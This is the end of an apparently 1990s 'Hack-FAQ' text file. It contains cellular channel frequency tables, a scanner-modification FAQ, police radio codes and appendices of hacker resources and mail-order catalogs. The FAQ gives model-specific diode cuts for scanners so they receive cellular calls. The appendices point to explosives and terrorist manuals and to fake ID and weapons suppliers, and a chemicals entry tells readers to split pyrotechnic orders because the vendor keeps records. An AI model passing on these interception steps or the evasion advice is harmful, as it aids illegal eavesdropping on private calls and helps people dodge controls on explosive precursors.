      877.050  877.020  876.990  876.960  876.930  876.900  876.870
      832.050  832.020  831.990  831.960  831.930  831.900  831.870

   6      214      213      212      211      210      209      208
      876.420  876.390  876.360  876.330  876.300  876.270  876.240
      831.420  831.390  831.360  831.330  831.300  831.270  831.240

   7      193      192      191      190      189      188      187
      875.790  875.760  875.730  875.700  875.670  875.640  875.610
      830.790  830.760  830.730  830.700  830.670  830.640  830.610

   8      172      171      170      169      168      167      166
      875.160  875.130  875.100  875.070  875.040  875.010  874.980
      830.160  830.130  830.100  830.070  830.040  830.010  829.980

   9      151      150      149      148      147      146      145
      874.530  874.500  874.470  874.440  874.410  874.380  874.350
      829.530  829.500  829.470  829.440  829.410  829.380  829.350

  10      130      129      128      127      126      125      124
      873.900  873.870  873.840  873.810  873.780  873.750  873.720
      828.900  828.870  828.840  828.810  828.780  828.750  828.720

  11      109      108      107      106      105      104      103
      873.270  873.240  873.210  873.180  873.150  873.120  873.090
      828.270  828.240  828.210  828.180  828.150  828.120  828.090

  12       88       87       86       85       84       83       82
      872.640  872.610  872.580  872.550  872.520  872.490  872.460
      827.640  827.610  827.580  827.550  827.520  827.490  827.460

  13       67       66       65       64       63       62       61
      872.010  871.980  871.950  871.920  871.890  871.860  871.830
      827.010  826.980  826.950  826.920  826.890  826.860  826.830

  14       46       45       44       43       42       41       40
      871.380  871.350  871.320  871.290  871.260  871.230  871.200
      826.380  826.350  826.320  826.290  826.260  826.230  826.200

  15       25       24       23       22       21       20       19
      870.750  870.720  870.690  870.660  870.630  870.600  870.570
      825.750  825.720  825.690  825.660  825.630  825.600  825.570

  16        4        3        2        1
      870.120  870.090  870.060  870.030
      825.120  825.090  825.060  825.030

FOR BAND B
==========

Cell #
Chan        1        2        3        4        5        6        7

   1      334      335      336      337      338      339      340
      880.020  880.050  880.080  880.110  880.140  880.170  880.200
      835.020  835.050  835.080  835.110  835.140  835.170  835.200

   2      355      356      357      358      359      360      361
      880.650  880.680  880.710  880.740  880.770  880.800  880.830
      835.650  835.680  835.710  835.740  835.770  835.800  835.830

   3      376      377      378      379      380      381      382
      881.280  881.310  881.340  881.370  881.400  881.430  881.460
      836.280  836.310  836.340  836.370  836.400  836.430  836.460

   4      397      398      399      400      401      402      403
      881.910  881.940  881.970  882.000  882.030  882.060  882.090
      836.910  836.940  836.970  837.000  837.030  837.060  837.090

   5      418      419      420      421      422      423      424
      882.540  882.570  882.600  882.630  882.660  882.690  882.720
      837.540  837.570  837.600  837.630  837.660  837.690  837.720

   6      439      440      441      442      443      444      445
      883.170  883.200  883.230  883.260  883.290  883.320  883.350
      838.170  838.200  838.230  838.260  838.290  838.320  838.350

   7      460      461      462      463      464      465      466
      883.800  883.830  883.860  883.890  883.920  883.950  883.980
      838.800  838.830  838.860  838.890  838.920  838.950  838.980

   8      481      482      483      484      485      486      487
      884.430  884.460  884.490  884.520  884.550  884.580  884.610
      839.430  839.460  839.490  839.520  839.550  839.580  839.610

   9      502      503      504      505      506      507      508
      885.060  885.090  885.120  885.150  885.180  885.210  885.240
      840.060  840.090  840.120  840.150  840.180  840.210  840.240

  10      523      524      525      526      527      528      529
      885.690  885.720  885.750  885.780  885.810  885.840  885.870
      840.690  840.720  840.750  840.780  840.810  840.840  840.870

  11      544      545      546      547      548      549      550
      886.320  886.350  886.380  886.410  886.440  886.470  886.500
      841.320  841.350  841.380  841.410  841.440  841.470  841.500

  12      565      566      567      568      569      570      571
      886.950  886.980  887.010  887.040  887.070  887.100  887.130
      841.950  841.980  842.010  842.040  842.070  842.100  842.130

  13      586      587      588      589      590      591      592
      887.580  887.610  887.640  887.670  887.700  887.730  887.760
      842.580  842.610  842.640  842.670  842.700  842.730  842.760

  14      607      608      609      610      611      612      613
      888.210  888.240  888.270  888.300  888.330  888.360  888.390
      843.210  843.240  843.270  843.300  843.330  843.360  843.390

  15      628      629      630      631      632      633      634
      888.840  888.870  888.900  888.930  888.960  888.990  889.020
      843.840  843.870  843.900  843.930  843.960  843.990  844.020

  16      649      650      651      652      653      654      655
      889.470  889.500  889.530  889.560  889.590  889.620  889.650
      844.470  844.500  844.530  844.560  844.590  844.620  844.650

Cell #
Chan        8        9       10       11       12       13       14

   1      341      342      343      344      345      346      347
      880.230  880.260  880.290  880.320  880.350  880.380  880.410
      835.230  835.260  835.290  835.320  835.350  835.380  835.410

   2      362      363      364      365      366      367      368
      880.860  880.890  880.920  880.950  880.980  881.010  881.040
      835.860  835.890  835.920  835.950  835.980  836.010  836.040

   3      383      384      385      386      387      388      389
      881.490  881.520  881.550  881.580  881.610  881.640  881.670
      836.490  836.520  836.550  836.580  836.610  836.640  836.670

   4      404      405      406      407      408      409      410
      882.120  882.150  882.180  882.210  882.240  882.270  882.300
      837.120  837.150  837.180  837.210  837.240  837.270  837.300

   5      425      426      427      428      429      430      431
      882.750  882.780  882.810  882.840  882.870  882.900  882.930
      837.750  837.780  837.810  837.840  837.870  837.900  837.930

   6      446      447      448      449      450      451      452
      883.380  883.410  883.440  883.470  883.500  883.530  883.560
      838.380  838.410  838.440  838.470  838.500  838.530  838.560

   7      467      468      469      470      471      472      473
      884.010  884.040  884.070  884.100  884.130  884.160  884.190
      839.010  839.040  839.070  839.100  839.130  839.160  839.190

   8      488      489      490      491      492      493      494
      884.640  884.670  884.700  884.730  884.760  884.790  884.820
      839.640  839.670  839.700  839.730  839.760  839.790  839.820

   9      509      510      511      512      513      514      515
      885.270  885.300  885.330  885.360  885.390  885.420  885.450
      840.270  840.300  840.330  840.360  840.390  840.420  840.450

  10      530      531      532      533      534      535      536
      885.900  885.930  885.960  885.990  886.020  886.050  886.080
      840.900  840.930  840.960  840.990  841.020  841.050  841.080

  11      551      552      553      554      555      556      557
      886.530  886.560  886.590  886.620  886.650  886.680  886.710
      841.530  841.560  841.590  841.620  841.650  841.680  841.710

  12      572      573      574      575      576      577      578
      887.160  887.190  887.220  887.250  887.280  887.310  887.340
      842.160  842.190  842.220  842.250  842.280  842.310  842.340

  13      593      594      595      596      597      598      599
      887.790  887.820  887.850  887.880  887.910  887.940  887.970
      842.790  842.820  842.850  842.880  842.910  842.940  842.970

  14      614      615      616      617      618      619      620
      888.420  888.450  888.480  888.510  888.540  888.570  888.600
      843.420  843.450  843.480  843.510  843.540  843.570  843.600

  15      635      636      637      638      639      640      641
      889.050  889.080  889.110  889.140  889.170  889.200  889.230
      844.050  844.080  844.110  844.140  844.170  844.200  844.230

  16      656      657      658      659      660      661      662
      889.680  889.710  889.740  889.770  889.800  889.830  889.860
      844.680  844.710  844.740  844.770  844.800  844.830  844.860

Cell #
Chan       15       16       17       18       19       20       21

   1      348      349      350      351      352      353      354
      880.440  880.470  880.500  880.530  880.560  880.590  880.620
      835.440  835.470  835.500  835.530  835.560  835.590  835.620

   2      369      370      371      372      373      374      375
      881.070  881.100  881.130  881.160  881.190  881.220  881.250
      836.070  836.100  836.130  836.160  836.190  836.220  836.250

   3      390      391      392      393      394      395      396
      881.700  881.730  881.760  881.790  881.820  881.850  881.880
      836.700  836.730  836.760  836.790  836.820  836.850  836.880

   4      411      412      413      414      415      416      417
      882.330  882.360  882.390  882.420  882.450  882.480  882.510
      837.330  837.360  837.390  837.420  837.450  837.480  837.510

   5      432      433      434      435      436      437      438
      882.960  882.990  883.020  883.050  883.080  883.110  883.140
      837.960  837.990  838.020  838.050  838.080  838.110  838.140

   6      453      454      455      456      457      458      459
      883.590  883.620  883.650  883.680  883.710  883.740  883.770
      838.590  838.620  838.650  838.680  838.710  838.740  838.770

   7      474      475      476      477      478      479      480
      884.220  884.250  884.280  884.310  884.340  884.370  884.400
      839.220  839.250  839.280  839.310  839.340  839.370  839.400

   8      495      496      497      498      499      500      501
      884.850  884.880  884.910  884.940  884.970  885.000  885.030
      839.850  839.880  839.910  839.940  839.970  840.000  840.030

   9      516      517      518      519      520      521      522
      885.480  885.510  885.540  885.570  885.600  885.630  885.660
      840.480  840.510  840.540  840.570  840.600  840.630  840.660

  10      537      538      539      540      541      542      543
      886.110  886.140  886.170  886.200  886.230  886.260  886.290
      841.110  841.140  841.170  841.200  841.230  841.260  841.290

  11      558      559      560      561      562      563      564
      886.740  886.770  886.800  886.830  886.860  886.890  886.920
      841.740  841.770  841.800  841.830  841.860  841.890  841.920

  12      579      580      581      582      583      584      585
      887.370  887.400  887.430  887.460  887.490  887.520  887.550
      842.370  842.400  842.430  842.460  842.490  842.520  842.550

  13      600      601      602      603      604      605      606
      888.000  888.030  888.060  888.090  888.120  888.150  888.180
      843.000  843.030  843.060  843.090  843.120  843.150  843.180

  14      621      622      623      624      625      626      627
      888.630  888.660  888.690  888.720  888.750  888.780  888.810
      843.630  843.660  843.690  843.720  843.750  843.780  843.810

  15      642      643      644      645      646      647      648
      889.260  889.290  889.320  889.350  889.380  889.410  889.440
      844.260  844.290  844.320  844.350  844.380  844.410  844.440

  16      663      664      665      666
      889.890  889.920  889.950  889.980
      844.890  844.920  844.950  844.980

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?

1. Buy an older scanner before they stopped them from receiving the
   necessary freqs (look at garage sales).
2. For a Realistic PRO-2004 open the case and cut one leg of D-513.
3. For a Realistic PRO-2005 open the case and cut one leg of D-502.
4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
   and 869-896 MHz.
5. Get the "Scanner Modification Handbook" volumes I and II by Bill
   Cheek from Communications Electronics Inc. (313)996-8888.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?

There are books available at Radio Shack for about $8 that list all
of the freqs used by area.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?

10-00 Series Code

10-0     Exercise great caution.
10-1     Reception is poor.
10-2     Reception is good.
10-3     Stop transmitting.
10-4     Message received.
10-5     Relay message.
10-6     Change channel.
10-7     Out of service/unavailable for assignment.
10-7A    Out of service at home.
10-7B    Out of service - personal.
10-7OD   Out of service - off duty
10-8     In service/available for assignment.
10-9     Repeat last transmission.
10-10    Off duty.
10-10A   Off duty at home.
10-11    Identify this frequency.
10-12    Visitors are present (be discreet).
10-13    Advise weather and road conditions.
10-14    Citizen holding suspect.
10-15    Prisoner in custody.
10-16    Pick up prisoner.
10-17    Request for gasoline.
10-18    Equipment exchange.
10-19    Return/returning to the station.
10-20    Location?
10-21    Telephone:______
10-21A   Advise home that I will return at ______.
10-21B   Phone your home
10-21R   Phone radio dispatch
10-22    Disregard the last assignment.
10-22C   Leave area if all secure; responsible person/owner is
         enroute.
10-23    Standby.
10-24    Request car-to-car transmission.
10-25    Do you have contact with _______?
10-26    Clear.
10-27    Driver's license check.
10-28    Vehicle registration request.
10-29    Check wants/warrants [vehicle] (PIN,SVS)
10-29a   Check wants/warrants [subject] (PIN)
10-29c   Check complete [subject]
10-29f   The subject is wanted for a felony.
10-29h   Caution - severe hazard potential.
10-29r   Check wants/record [subject] (PIN,CJIC)
10-29m   The subject is wanted for a misdemeanor.
10-29v   The vehicle is wanted in connection with a possible crime.
10-30    Does not conform to regulations.
10-32    Drowning.
10-33    Alarm sounding.
10-34    Assist at office.
10-35    Time check.
10-36    Confidential information.
10-37    Identify the operator.
10-39    Can ______ come to the radio?
10-40    Is ______ available for a telephone call?
10-42    Check on the welfare of/at ______.
10-43    Call a doctor.
10-45    What is the condition of the patient?
10-45A   Condition of patient is good.
10-45B   Condition of patient is serious.
10-45C   Condition of patient is critical.
10-45D   Patient is deceased.
10-46    Sick person [amb. enroute]
10-48    Ambulance transfer call
10-49    Proceed to/Enroute to ______.
10-50    Subject is under the influence of narcotics./Take a report.
10-51    Subject is drunk.
10-52    Resuscitator is needed.
10-53    Person down.
10-54    Possible dead body.
10-55    This is a coroner's case.
10-56    Suicide.
10-56A   Suicide attempt.
10-57    Firearm discharged.
10-58    Garbage complaint
10-59    Security check./Malicious mischief
10-60    Lock out.
10-61    Miscellaneous public service.
10-62    Meet a citizen.
10-62A   Take a report from a citizen.
10-62B   Civil standby.
10-63    Prepare to copy.
10-64    Found property.
10-65    Missing person
10-66    Suspicious person.
10-67    Person calling for help.
10-68    Call for police made via telephone.
10-70    Prowler.
10-71    Shooting.
10-72    Knifing.
10-73    How do you receive?
10-79    Bomb threat.
10-80    Explosion.
10-86    Any traffic?
10-87    Meet the officer at ______.
10-88    Fill with the officer/Assume your post.
10-91    Animal.
10-91a   Stray.
10-91b   Noisy animal.
10-91c   Injured animal.
10-91d   Dead animal.
10-91e   Animal bite.
10-91g   Animal pickup.
10-91h   Stray horse
10-91j   Pickup/collect ______.
10-91L   Leash law violation.
10-91V   Vicious animal.
10-95    Out of vehicle-pedestrian/Requesting an I.D./Tech unit.
10-96    Out of vehicle-ped. send backup
10-97    Arrived at the scene.
10-98    Available for assignment.
10-99    Open police garage door
10-100   Civil disturbance - Mutual aid standby.
10-101   Civil disturbance - Mutual aid request.

11-00 Series Code

11-10    Take a report.
11-24    Abandoned automobile.
11-25    Traffic hazard.
11-26    Abandoned bicycle.
11-27    10-27 with the driver being held.
11-28    10-28 with the driver being held.
11-40    Advise if an ambulance is needed.
11-41    An ambulance is needed.
11-42    No ambulance is needed.
11-48    Furnish transportation.
11-51    Escort.
11-52    Funeral detail.
11-54    Suspicious vehicle.
11-55    Officer is being followed by automobile.
11-56    Officer is being followed by auto containing dangerous
         persons.
11-57    An unidentified auto appeared at the scene of the
         assignment.
11-58    Radio traffic is being monitored. Phone all non-routine
         messages.
11-59    Give intensive attention to high hazard/business areas.
11-60    Attack in a high hazard area.
11-65    Signal light is out.
11-66    Defective traffic light.
11-78    Aircraft accident.
11-79    Accident - ambulance has been sent.
11-80    Accident - major injuries.
11-81    Accident - minor injuries.
11-82    Accident - no injuries.
11-83    Accident - no details.
11-84    Direct traffic.
11-85    Tow truck required.
11-94    Pedestrian stop.
11-95    Routine traffic stop.
11-96    Checking a suspicious vehicle.
11-97    Time/security check on patrol vehicles.
11-98    Meet: _______
11-99    Officer needs help.

900 Series Codes

904      Fire.
904A     Automobile fire.
904B     Building fire.
904G     Grass fire.
909      Traffic problem; police needed.
910      Can handle this detail.
932      Turn on _______ mobile relay at _______.
933      Turn off mobile relay.
949      Burning inspection at _______.
950      Control burn in progress/about to begin/ended.
951      Need fire investigator.
952      Report on conditions.
953      Investigate smoke.
953A     Investigate gas.
954      Off the air at the scene of the fire.
955      Fire is under control.
956      Assignment not finished.
957      Delayed response of __ minutes.
980      Restrict calls to emergency only.
981      Resume normal traffic.
1000     Plane crash
3000     Road block

Other Codes

Code 1   Do so at your convenience.
Code 2   Urgent.
Code 3   Emergency/lights and siren.
Code 4   No further assistance is needed.
Code 5   Stakeout.
Code 6   Responding from a long distance.
Code 7   Mealtime.
Code 8   Request cover/backup.
Code 9   Set up a roadblock.
Code 10  Bomb threat
Code 12  Notify news media
Code 20  Officer needs assistance
Code 22  Restricted radio traffic
Code 30  Officer needs HELP - EMERGENCY!
Code 33  Mobile emergency - clear this radio channel.
Code 43  TAC forces committed.
AID      Public Safety Assistance

Phonetic Alphabet

A   Adam        N   Nora
B   Boy         O   Ocean
C   Charles     P   Paul
D   David       Q   Queen
E   Edward      R   Robert
F   Frank       S   Sam
G   George      T   Tom
H   Henry       U   Union
I   Ida         V   Victor
J   John        W   William
K   King        X   X-ray
L   Lincoln     Y   Yellow
M   Mary        Z   Zebra

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?

Vehicles

    Item             Example
 1. Color            Red over black
 2. Year             1984
 3. Make             Cadillac
 4. Body             Two door
 5. License plate    6VWH926 (given phonetically!)

Persons

 1. Name
 2. Race
 3. Sex
 4. Age
 5. Height
 6. Weight
 7. Hair color
 8. Eye color
 9. Complexion
10. Physical marks, tattoos, scars, limps, etc.
11. Clothing (head to feet)
    a. Hat
    b. Shirt; tie
    c. Coat
    d. Trousers
    e. Socks
    f. Shoes

=====================================================================
Appendix A.
FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com  (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org  /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu  /pub/mccoy/computer-underground/
black.ox.ac.uk  Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov             \ These two sites will give you
martini.eecs.umich.edu 3000  / whatever info you need about any city.

=====================================================================
Appendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers  (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip

Also try IRC #hack. *** WARNING: May be lame at times!!! ***

=====================================================================
Appendix D. Publications and Zines

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600: The Hacker Quarterly
a technical journal put out by hackers

mail:                        email:
  2600                         2600@well.sf.ca.us
  PO Box 752                   emmanuel@well.sf.ca.us
  Middle Island, NY 11953
  PH: 516-751-2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK
The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED
The magazine of the cyberculture.

Email: subscription@wired.com
       info@wired.com

Or look for it on many newsstands.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fringe Ware Review

Email: fringeware@io.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Iron Feather Journal

Mail: IFJ
      PO Box 1905
      Boulder CO 80306

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Groom Lake Desert Rat

Email: psychospy@aol.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Cybertek: The Cyberpunk Technical Journal

Mail: Cybertek
      PO Box 64
      Brewster NY 10509

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
LineNoiz

Email: dodger@fubar.bk.psu.edu
       with 'subscription linenoiz ' in the body of the message

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
For more info on zines, check out Factsheet Five and Factsheet Five
Electronic.

email: jerod23@well.sf.ca.us

=====================================================================
Appendix E. Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.

Davis, Tenney L.: "Chemistry of Powder and Explosives."

Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)

Russell: "Computer Security Basics"

Cornwall: "The (New) Hacker's Handbook"

"Cyberpunk" (forget the authors)

Kochan & Wood: "UNIX System Security"

Spafford & Garfinkel: "Practical UNIX Security"

Stoll, Clifford: "The Cuckoo's Egg"

Gasser, Morrie: "Building a Secure Computer System"

THE RAINBOW SERIES
Can be obtained free from:
    INFOSEC Awareness Office
    National Computer Security Centre
    9800 Savage Road
    Fort George G. Meade, MD 20755-6000
    Tel: 1-301-766-8729

"The Improvised Munitions Manual"

=====================================================================
Appendix F. Files and Papers.
Morris & Thompson: "Password Security, A Case History"

Curry: "Improving the Security of your UNIX System"
    available via FTP as 'security-doc.tar.Z'

Klein: "Foiling the Cracker: A Survey of, and Improvements to,
    Password Security."
    Archie search for 'Foiling'

Cheswick: "The Design of a Secure Internet Gateway"
    available from research.att.com
    /dist/Secure_Internet_Gateway.ps

Cheswick: "An Evening with Berford: in which a Cracker is Lured,
    Endured and Studied"
    available from research.att.com /dist/berford.ps

Bellovin89: "Security Problems in the TCP/IP Protocol Suite"
    available from research.att.com /dist/ipext.ps.Z

Bellovin91: "Limitations of the Kerberos Authentication System"
    available from research.att.com

CERT: many various bits of info collected at cert.sei.cmu.edu

"Open Systems Security"
    available from ajk.tele.fi (131.177.5.20) /PublicDocuments

RFC-1244: "The Site Security Handbook"

"The Terrorist's Handbook"
    how to make various explosives, propellants and ignitors and also
    how to apply and use them

=====================================================================
Appendix G. Catalogs

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Lockpicks (from Belisarius)

You can get lockpicks from:

    American Systems
    2100 Roswell Road
    Suite 200C-223
    Marietta, GA 30062

Lock Pick Sets
==============
Novice ($32.50):   11 pix, tension wrenches and a broken key
                   extractor. Pouch.
Deluxe ($54.60):   16 pix, wrenches, extractor. Pocket size leather
                   case.
Superior ($79.80): 32 pix, wrenches, extractor. Hand finished leather
                   case.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Explosives and other underground stuff

Loompanics is one of the major distributors of material relating to
the underground including explosives. You can get the catalog by
mailing:

    Loompanics Unlim
    P.O. Box 1197
    Port Townsend, Wash 98368

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fake IDs, Technical Manuals on almost anything (from CyberSorceror)

    NIC/LAW ENFORCEMENT SUPPLY
    500 Flournoy Lucas Road/Building #3
    Post Office Box 5950
    Shreveport, LA 71135-5950
    Phone: (318) 688-1365
    FAX: (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Weapons, explosives, survival gear. (from CyberSorceror)

    Phoenix Systems, INC.
    P.O. Box 3339
    Evergreen, CO 80439
    (303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces (battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Paladin Press
PO Box 1307
Boulder, CO 80306

Enclose $2 for the publishers of the "Action Library". Books on
lockpicking, wiretapping, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)

Their Customer Service Number is as follows: 1-800-333-5102
Their Hours are: 9am-9pm, Monday-Friday

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
For beige boxing, data com cracking/patching tools try:

    TIME MOTION TOOLS
    12778 BROOKPRINTER PLACE
    POWAY, CA 92064-6810
    (619) 679-0303
    (800) 779-8170

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age! (from Neurophyre)

    Hagenow Laboratories, Inc.
    1302 Washington St.
    Manitowoc, WI 54220

Send a crisp $1 bill and a request for a catalog. Tip: Don't order
all your pyro stuff from here. They DO keep records. Be safe.

=====================================================================
Appendix H. PGP keys

None available currently ...

=====================================================================
*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy's plans and you will know ******
***** which strategy will be successful and which will not.    ******
*****                           -- Sun Tzu, The Art of War     ******
*********************************************************************
*********************************************************************